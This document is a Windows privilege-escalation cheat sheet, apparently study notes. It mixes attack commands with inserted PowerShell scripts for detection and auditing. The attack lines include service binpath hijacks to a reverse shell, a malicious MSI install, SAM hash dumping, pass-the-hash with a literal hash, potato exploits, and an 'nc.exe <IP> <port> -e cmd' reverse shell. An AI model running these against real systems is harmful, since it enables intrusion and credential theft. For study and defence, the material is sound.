# Windows

**- Registry**\
HKLM is for all users, HKCU is for the current user.

**- Check security groups of current user**

```
whoami /Groups
net user <username>
```

**1. Insecure Service Permissions**

```
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
sc qc <service=daclsvc>
# Elevated privileges as 'SERVICE_START_NAME : LocalSystem'
sc config <service=daclsvc> binpath="<path-to-reverse-shell>"
sc start <service=daclsvc>
```

**2. Unquoted Service Path**

```
sc qc unquotedsvc
accesschk.exe -d "C:\Program Files\Unquoted Path Service\"
copy reverse.exe "C:\Program Files\Unquoted Path Service\Common"
sc start unquotedsvc
```

**3. Weak Registry Permissions**

NT AUTHORITY\INTERACTIVE = all logged-in users

`REG_EXPAND_SZ`: an expandable data string.\
`REG_SZ`: this data type has a fixed length.

```
sc qc regsvc
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell>
```
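Both `sc config ... binpath=` (section 1) and `reg add ... /v ImagePath` (section 3) end up rewriting the service's `ImagePath` value, which is what detection can key on. The following PowerShell is an added example and not part of the original notes: it reads recent Service Control Manager 7045 events (new service installed) from the System log and, where Sysmon is deployed with a registry rule covering `HKLM\SYSTEM\CurrentControlSet\Services`, Sysmon event 13 (registry value set) for `...\Services\<name>\ImagePath`, and flags images in user-writable locations or pointing at a command interpreter. The `$SuspiciousImage` pattern and the 24-hour window are this example's own assumptions and should be tuned per environment.

```powershell
# Added example, not from the original notes. Assumes the System log is
# readable and, for the second check, Sysmon with a RegistryEvent rule that
# covers HKLM\SYSTEM\CurrentControlSet\Services. Read-only: it changes nothing.

# Heuristic for an ImagePath a legitimate service rarely has (assumption, tune per host)
$SuspiciousImage = '\\(Users|Temp|ProgramData|Public|AppData)\\|cmd\.exe|powershell\.exe|\.bat\b|\.msi\b'

function Get-EventDataMap {
    # Flatten an event's <EventData><Data Name="...">value</Data> entries into a hashtable
    param($Event)
    $map = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $map[$d.Name] = $d.'#text' }
    return $map
}

function Find-ServiceImagePathTampering {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $hits  = @()

    # 1) New services: System log, Service Control Manager event 7045
    $installed = Get-WinEvent -FilterHashtable @{
        LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since
    } -ErrorAction SilentlyContinue
    foreach ($e in $installed) {
        $d = Get-EventDataMap $e
        if ($d['ImagePath'] -match $SuspiciousImage) {
            $hits += [pscustomobject]@{
                Time    = $e.TimeCreated
                Source  = 'SCM 7045 (new service)'
                Service = $d['ServiceName']
                Image   = $d['ImagePath']
                Context = "runs as $($d['AccountName'])"
            }
        }
    }

    # 2) ImagePath rewrites: Sysmon event 13 (RegistryEvent, value set).
    #    Both "sc config <svc> binpath=" and "reg add ... /v ImagePath" produce this.
    $regSets = Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 13; StartTime = $since
    } -ErrorAction SilentlyContinue
    foreach ($e in $regSets) {
        $d = Get-EventDataMap $e
        if (-not ($d['TargetObject'] -match '\\Services\\([^\\]+)\\ImagePath$')) { continue }
        $svcName = $Matches[1]                      # capture before the next -match resets $Matches
        if ($d['Details'] -notmatch $SuspiciousImage) { continue }
        $hits += [pscustomobject]@{
            Time    = $e.TimeCreated
            Source  = 'Sysmon 13 (ImagePath set)'
            Service = $svcName
            Image   = $d['Details']
            Context = "$($d['User']) via $($d['Image'])"
        }
    }
    return $hits
}

Find-ServiceImagePathTampering -Hours 24 | Sort-Object Time | Format-Table -AutoSize
```

Without Sysmon only the first check runs; the 7045 event records the service account the new service runs as, not who created it, so pair it with Security event 4697 (audit of service installation) if that audit policy is enabled.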

**4. Insecure Service Executables**

```
sc qc <service>
accesschk.exe <path-to-service.exe>
# output - RW Everyone
# Replace the service executable with reverse shell generated
```
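The four service checks above (service DACL, unquoted path, service registry key ACL, service executable ACL) can be run over every installed service at once. The following PowerShell audit is an added example, not part of the original notes or of accesschk or PowerUp: it reads each service's security descriptor with `sc.exe sdshow`, the registry key and binary ACLs with `Get-Acl`, and reports services where Everyone, Users, Authenticated Users or INTERACTIVE hold a right that allows modification. The set of "broad" SIDs and the right masks are this example's own assumptions.

```powershell
# Added example, not from the original notes. Reports only; it changes nothing.
# Run as the low-privileged account being assessed so the ACL view matches its rights.

# Identities that mean "any logged-in user" (SIDs are stable across OS languages):
# Everyone, BUILTIN\Users, Authenticated Users, NT AUTHORITY\INTERACTIVE
$BroadSids = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')

# Bits that allow modifying the object. The low bits mean "write" for both files
# (WriteData/AppendData) and registry keys (SetValue/CreateSubKey); DELETE,
# WRITE_DAC, WRITE_OWNER, GENERIC_ALL and GENERIC_WRITE are common to all.
$ObjectWriteMask  = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000
# For services 0x2 is SERVICE_CHANGE_CONFIG (enough to change binPath); 0x4 is only QUERY_STATUS.
$ServiceWriteMask = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-BroadSid {
    param($Identity)   # NTAccount or SecurityIdentifier
    try {
        $sid = $Identity.Translate([System.Security.Principal.SecurityIdentifier]).Value
        return $BroadSids -contains $sid
    } catch { return $false }
}

function Test-BroadWriteAccess {
    param([string]$Path)   # file path or registry provider path (HKLM:\...)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (-not (Test-BroadSid $ace.IdentityReference)) { continue }
        # FileSystemAccessRule and RegistryAccessRule name the rights property differently
        $rightsProp = $ace.PSObject.Properties['FileSystemRights']
        if (-not $rightsProp) { $rightsProp = $ace.PSObject.Properties['RegistryRights'] }
        if (([int]$rightsProp.Value -band $ObjectWriteMask) -ne 0) { return $true }
    }
    return $false
}

function Test-BroadServiceWriteAccess {
    param([string]$Name)
    # sc.exe sdshow prints the service DACL as SDDL; parse it instead of Get-Acl, which has no service provider
    $sddl = (& sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return $false }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        if (-not (Test-BroadSid $ace.SecurityIdentifier)) { continue }
        if (($ace.AccessMask -band $ServiceWriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceImagePath {
    param([string]$CommandLine)
    if ($CommandLine -match '^"([^"]+)"')  { return $Matches[1] }   # quoted: take what is inside the quotes
    if ($CommandLine -match '^(.*?\.exe)') { return $Matches[1] }   # unquoted: everything up to the first .exe
    return ($CommandLine -split ' ')[0]
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (-not $svc.PathName) { continue }
    $image  = Get-ServiceImagePath $svc.PathName
    $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    $issues = @()
    if (Test-BroadServiceWriteAccess $svc.Name)              { $issues += 'weak service DACL (1)' }
    if ($svc.PathName -notmatch '^"' -and $image -match ' ') { $issues += 'unquoted path with spaces (2)' }
    if (Test-BroadWriteAccess $regKey)                       { $issues += 'weak registry key ACL (3)' }
    if (Test-BroadWriteAccess $image)                        { $issues += 'writable executable (4)' }
    if ($issues) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Image = $image; Issues = ($issues -join '; ') }
    }
}
$findings | Format-Table -AutoSize
```

The number in each issue label refers to the section above it corresponds to. A finding is only exploitable when the service also runs as a more privileged account than the caller (the `RunsAs` column), which is why `sc qc` is checked first in each section.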

**5. Registry Autoruns**\
\[Todo]

**6. Registry AlwaysInstallElevated**\
Set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys:\
`HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`\
`HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer`

```
# Check the keys
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

# Payload generation
msfvenom -f msi
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
# [/i - install ]
```

**7. Passwords in Registry**

```
reg query HKLM /f password /s
# Adding autologon password
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /d testing123 /t REG_SZ

# DefaultUsername and DefaultPassword in autologin
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

# Query registry value [?]
Get-ChildItem -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\'
```
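Sections 6 and 7 both come down to a registry state that any local user can read. The following PowerShell is an added example, not part of the original notes: it checks that `AlwaysInstallElevated` is 1 under both the HKCU and HKLM Installer keys (the setting has no effect unless both are set) and whether Winlogon holds a `DefaultPassword`, and with `-Remediate` sets the Installer values to 0 and removes the stored password. The function name and the `-Remediate` switch are this example's own.

```powershell
# Added example, not from the original notes. Reports the two conditions from
# sections 6 and 7 and undoes them only when -Remediate is given (writing under
# HKLM requires an elevated prompt).
function Invoke-InstallerAndAutologonCheck {
    param([switch]$Remediate)

    $installerKeys = @(
        'HKCU:\Software\Policies\Microsoft\Windows\Installer',
        'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    )
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

    function Get-RegValue {
        param([string]$Key, [string]$Name)
        try   { return (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name }
        catch { return $null }   # key or value does not exist
    }

    $findings = @()

    # 6. AlwaysInstallElevated is only effective when BOTH keys hold 1
    $values  = foreach ($k in $installerKeys) { [int](Get-RegValue $k 'AlwaysInstallElevated') }
    $setToOne = @($values | Where-Object { $_ -eq 1 }).Count
    if ($setToOne -eq $installerKeys.Count) {
        $findings += 'AlwaysInstallElevated is 1 in both HKCU and HKLM: any user can install an MSI as SYSTEM'
        if ($Remediate) {
            foreach ($k in $installerKeys) { Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord }
        }
    }

    # 7. Autologon keeps the account password in cleartext under Winlogon,
    #    which is exactly what "reg query HKLM /f password /s" turns up
    $autologon = Get-RegValue $winlogon 'AutoAdminLogon'
    $stored    = Get-RegValue $winlogon 'DefaultPassword'
    if ($null -ne $stored) {
        $user = Get-RegValue $winlogon 'DefaultUserName'
        $findings += "Winlogon\DefaultPassword is set for user '$user' (AutoAdminLogon=$autologon); the key is readable by any local user"
        if ($Remediate) {
            Remove-ItemProperty -Path $winlogon -Name DefaultPassword
        }
    }

    if (-not $findings) { return 'No findings' }
    return $findings
}

Invoke-InstallerAndAutologonCheck               # report only
# Invoke-InstallerAndAutologonCheck -Remediate  # from an elevated prompt, to fix
```

Removing `DefaultPassword` breaks autologon on that host, which is the intended outcome; if autologon is genuinely needed, the supported alternative is the LSA secret that `Sysinternals Autologon` writes instead of the cleartext value.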

**8. Retrieve password from SAM SYSTEM registry hives**\
\- The SAM hive is not directly accessible:\
`reg query HKLM\SAM\SAM`\
ERROR: Access is denied.

```
python3 creddump7/pwdump.py SYSTEM SAM
# Crack NTLM hash
```

**9. If creds are saved from a previous user \[run the exe from a folder which belongs to the admin/higher-privilege user]**

```
# list saved creds
cmdkey /list

# run an executable with priv's on another user
runas /savecred /user:<> <path-to-exec>
```

**10. Pass the Hash (pth)**

```
# pth using impacket via SMB [pth-winexe works on SMB]
psexec.py admin@10.10.92.1 -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da

# xfreerdp with pth (pass-the-hash) [NT component only in LM:NT if no password for LM]
xfreerdp +clipboard /u:admin /pth:a9fdfa038c4b75ebc76dc855dd74f0da /cert:ignore /v:10.10.92.1
```

**11. Task running at regular intervals**\
Append "path-to-exec" at the end of the PowerShell script the task runs.

**12. Insecure GUI Apps**\
File > Open > navigation pane > C:\Windows\System32\cmd.exe

**13. Startup Apps \[createshortcut.vbs]**\
Add a shortcut to the reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp".

**14. RoguePotato Attack**

{% embed url="https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf" %}

• You need a compromised account on the victim machine with impersonate privileges.

```
# s0 - check that SeImpersonatePrivilege is Enabled
whoami /priv
# s1
sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:<IP of target>:9999
# s2
nc -nlvp <port-used-in-reverse-exec>
# s3 - when running as "nt authority\local service"
RoguePotato.exe -r <IP of attacker> -e "<path-to-exec>" -l 9999
```

\- run as a local service "nt authority\local service"

```
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe"
# -or-
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
```

**15. PrintSpoofer**

```
PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i
```

**- Tools**\
winpeasany.exe\
seatbelt.exe all full\
sharp.exe audit\
JAWS \[works in the presence of AV solutions]

**- PowerUp**

```
Import-Module powerup.ps1
Invoke-AllChecks
Get-ServiceUnquoted
```

**- List of Exploitable Privileges**

{% embed url="https://github.com/gtworek/Priv2Admin" %}

**- SeImpersonate**

```
# PrintSpoofer32.exe [requires an executable file. Hence, PowerShell scripts don't work]
.\PrintSpoofer32.exe -c 'nc.exe <IP> <port> -e cmd'
```
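`whoami /priv` only shows the privileges of the current token. To see which accounts on a host are assigned the privileges that Priv2Admin and the SeImpersonate techniques above build on, the user-rights assignment itself has to be read. The following PowerShell is an added example, not part of the original notes or of Priv2Admin: it exports the local policy with `secedit /export` (this needs an elevated prompt), parses the `[Privilege Rights]` lines of the INF it writes, resolves the SIDs to account names and lists the holders of each privilege. `$HighRiskPrivileges` is this example's own shortlist, not a list taken from the page.

```powershell
# Added example, not from the original notes. Read-only; needs an elevated prompt
# because secedit /export requires it. $HighRiskPrivileges is this example's own list.
$HighRiskPrivileges = @(
    'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeDebugPrivilege',
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
    'SeLoadDriverPrivilege', 'SeTcbPrivilege', 'SeCreateTokenPrivilege'
)

function Get-PrivilegeHolders {
    # Export only the user-rights area; the INF is UTF-16, which Get-Content detects by its BOM
    $inf = Join-Path $env:TEMP ('rights-{0}.inf' -f [guid]::NewGuid())
    & secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
    try {
        $rows = foreach ($line in Get-Content -LiteralPath $inf) {
            # Lines look like: SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6
            if (-not ($line -match '^(Se\w+)\s*=\s*(.+)$')) { continue }
            $priv    = $Matches[1]
            $entries = $Matches[2] -split ','
            $holders = foreach ($h in $entries) {
                $h = $h.Trim()
                if ($h -match '^\*?S-1-') {
                    # "*S-1-..." is a SID; translate it to DOMAIN\name, fall back to the SID if that fails
                    $sid = New-Object System.Security.Principal.SecurityIdentifier($h.TrimStart('*'))
                    try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $h }
                } else { $h }
            }
            [pscustomobject]@{
                Privilege = $priv
                HighRisk  = $HighRiskPrivileges -contains $priv
                Holders   = ($holders -join ', ')
            }
        }
        return $rows
    } finally {
        Remove-Item -LiteralPath $inf -ErrorAction SilentlyContinue
    }
}

# Show the risky ones; any holder beyond the built-in service accounts and
# Administrators deserves a second look.
Get-PrivilegeHolders | Where-Object HighRisk | Format-Table Privilege, Holders -AutoSize -Wrap
```

Service accounts (LOCAL SERVICE, NETWORK SERVICE, IIS application pool identities) hold SeImpersonatePrivilege by design, which is why a foothold in such a service is the precondition named in section 14; the defensive lever is keeping that privilege off ordinary user and custom service accounts, not removing it from the built-ins.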
